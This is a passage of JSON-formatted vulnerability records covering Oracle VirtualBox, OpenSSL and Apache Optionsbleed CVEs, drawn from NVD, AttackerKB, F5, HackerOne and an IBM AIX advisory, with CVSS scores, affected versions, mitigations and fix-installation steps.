"baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2843"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2843", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2835", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2835"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2835", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-10-03T13:07:43", "description": "OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an \"error state\" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-07T16:29:00", "title": "CVE-2017-3737", "type": "cve", "cwe": ["CWE-125", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3737"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:openssl:openssl:1.0.2h", "cpe:/a:openssl:openssl:1.0.2l", "cpe:/a:openssl:openssl:1.0.2c", "cpe:/a:openssl:openssl:1.0.2b", "cpe:/a:openssl:openssl:1.0.2f", "cpe:/a:openssl:openssl:1.0.2j", "cpe:/a:openssl:openssl:1.0.2d", "cpe:/a:openssl:openssl:1.0.2m", "cpe:/a:openssl:openssl:1.0.2e", "cpe:/a:openssl:openssl:1.0.2i", "cpe:/a:openssl:openssl:1.0.2g", "cpe:/a:openssl:openssl:1.0.2k", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-3737", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3737", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2m:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2i:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2831", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2831"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2831", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2831", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2837", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2837"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2837", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2836", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2836"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2836", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2020-11-18T06:44:57", "bulletinFamily": "info", "cvelist": ["CVE-2017-9798"], "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user\u2019s .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.\n\n \n**Recent assessments:** \n \n**h00die** at March 25, 2020 12:20am UTC reported:\n\nThis vulnerability only happens when the `Limit` method is defined. This most likely isn\u2019t very common in enterprise environments, and also the `Limit` method needs to be configured in an invalid way. \nPending all that is true, which is unlikely, its possible to send an `OPTIONS` HTTP request and get back arbitrary memory. \nUnlike Heartbleed, we\u2019re receiving back minimal memory and its also intermingled with the response. \nFrom my testing, against a test server, no useful data was found. It\u2019s possible a production server on a very busy website may have divulged more useful data, but it would have to be minimal due to the returned buffer size.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 5\n", "modified": "2020-10-16T00:00:00", "published": "2017-09-18T00:00:00", "id": "AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "href": "https://attackerkb.com/topics/SIdDaaNMPp/cve-2017-9798", "type": "attackerkb", "title": "CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2019-06-28T14:42:24", "bulletinFamily": "software", "cvelist": ["CVE-2017-3737"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-01-26T18:52:00", "published": "2018-01-26T18:52:00", "id": "F5:K43452233", "href": "https://support.f5.com/csp/article/K43452233", "title": "OpenSSL vulnerability CVE-2017-3737", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-06T22:40:46", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nF5 Product Development has assigned ID 684033 (BIG-IP) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP AAM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP AFM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP Analytics | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP APM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP ASM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP DNS | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 | Not vulnerable1 | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP Link Controller | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP PEM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable1 | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP WebSafe | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable1 | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable1 | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations. Additionally, F5 iWorkflow does not run Apache HTTPD.\n\nNone\n\nConfiguring the BIG-IP system to protect vulnerable back-end Apache servers\n\nWhile the BIG-IP system is not vulnerable, the BIG-IP system will proxy exploits to vulnerable Apache servers behind the BIG-IP system. You can protect these servers by disallowing the **OPTIONS** method in all requests. To do so, you can apply any of the following methods to each BIG-IP virtual server:\n\n**Impact of action**: Requests using the **OPTIONS** method will be blocked.\n\n * You can use the **HTTP::method** iRules command to check for the **OPTIONS** method and then perform actions such as returning an HTTP 501 response code to the client. For more information, refer to the following iRules snippet: \n\nwhen HTTP_REQUEST { \n if { [HTTP::method] equals \"OPTIONS\" } { \n HTTP::respond 501 \n } else { \n # additional logic if needed. \n } \n}\n\n * The HTTP profile allows you to limit the permitted HTTP methods in the **Known Methods** setting (under the **Enforcement** section). You can configure the affected HTTP profile with the value **Reject** for the **Unknown Method** setting and delete the value **OPTIONS** from the **Known Methods** setting.\n * For the BIG-IP PSM system, by default, the HTTP Security profile does not allow the HTTP OPTIONS method. You can associate the default HTTP Security profile to the affected virtual servers.\n * For the BIG-IP ASM system, by default, the ASM security policy does not allow the HTTP OPTIONS method. You must ensure that the HTTP OPTIONS method is not configured in the **Allowed Methods** setting on the **Security** &gt; **Application Security** &gt; **Headers** &gt; **Methods** page. The BIG-IP ASM system will log an Illegal Method violation when it detects HTTP methods that are not listed in the **Allowed Methods** setting. For more information, refer to [K12312: Overview of BIG-IP ASM Illegal Method violations](<https://support.f5.com/csp/article/K12312>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-08-20T21:19:00", "published": "2017-09-19T08:44:00", "id": "F5:K70084351", "href": "https://support.f5.com/csp/article/K70084351", "title": "Apache HTTPD vulnerability CVE-2017-9798", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-05T00:02:32", "bulletinFamily": "software", "cvelist": ["CVE-2018-0739"], "description": "\nF5 Product Development has assigned ID 713806, 713829, 713821, 713838 (BIG-IP), ID 713971 (BIG-IQ/F5 iWorkflow), ID 713969 (Enterprise Manager), and CPF-24850, CPF-24851, CPF-24852 (Traffix) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H08044291 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.2.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H>) | OpenSSL command line utility \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should avoid processing untrusted PKCS files on the affected systems.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-04-16T23:32:00", "published": "2018-04-13T19:25:00", "id": "F5:K08044291", "href": "https://support.f5.com/csp/article/K08044291", "title": "OpenSSL vulnerability CVE-2018-0739", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "hackerone": [{"lastseen": "2019-01-28T00:16:50", "bulletinFamily": "bugbounty", "bounty": 100.0, "cvelist": ["CVE-2017-9798"], "description": "Bug has been disclosed here:\nhttps://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\n\npoc code:\nhttps://github.com/hannob/optionsbleed\n\nApache is currently preparing 2.4.28, which will contain the fix, a patch is available in their svn repo.", "modified": "2018-05-03T14:45:58", "published": "2017-09-19T18:04:00", "id": "H1:269568", "href": "https://hackerone.com/reports/269568", "type": "hackerone", "title": "Apache httpd (IBB): Optionsbleed / CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "aix": [{"lastseen": "2019-05-29T19:19:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3737"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Mon Jan 29 10:36:55 CST 2018\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\n\n\nSecurity Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2017-3737) \n\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in OpenSSL used by AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2017-3737\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737\n DESCRIPTION: OpenSSL could allow a remote attacker to bypass security \n restrictions, caused by a flaw in the \"error state\" mechanism when \n directly calling SSL_read() or SSL_write() for an SSL object after \n receiving a fatal error. An attacker could exploit this vulnerability \n to bypass the decryption or encryption process and perform unauthorized \n actions.\n CVSS Base Score: 5.9 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/136077 for the \n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector:(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N )\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY \n ------------------------------------------------------\n openssl.base 1.0.2.500 1.0.2.1300 key_w_fs\n openssl.base 20.13.102.1000 20.13.102.1300 key_w_fs\n\n Note: \n A. 0.9.8, 1.0.1 OpenSSL versions are out-of-support. Customers are \n advised to upgrade to currently supported OpenSSL 1.0.2 version.\n\n B. Latest level of OpenSSL fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n \n To find out whether the affected filesets are installed on your systems, \n refer to the lslpp command found in the AIX user's guide.\n\n Example: lslpp -L | grep -i openssl.base\n\n REMEDIATION:\n\n FIXES\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar\n http://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar\n https://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar \n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n Note that the tar file contains Interim fixes that are based on \n OpenSSL version, and AIX OpenSSL fixes are cumulative.\n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 102m_ifix.180105.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 5.3, 6.1, 7.1, 7.2 fips_102m.180105.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 2.2.* 102m_ifix.180105.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 2.2.* fips_102m.180105.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n \n To extract the fixes from the tar file:\n\n tar xvf openssl_fix25.tar\n cd openssl_fix25\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ------------------------------------------------------------------------------------------------------\n dbc850209a5920c95493125817dd2cdc90fbc01f44f31dd1c4b19c889cf446e9 102m_ifix.180105.epkg.Z key_w_csum\n 86b9ee0f6367f783fbad4c8a98a32d0481c18252c57ae5ac043cea1bf3d8f0b4 fips_102m.180105.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures 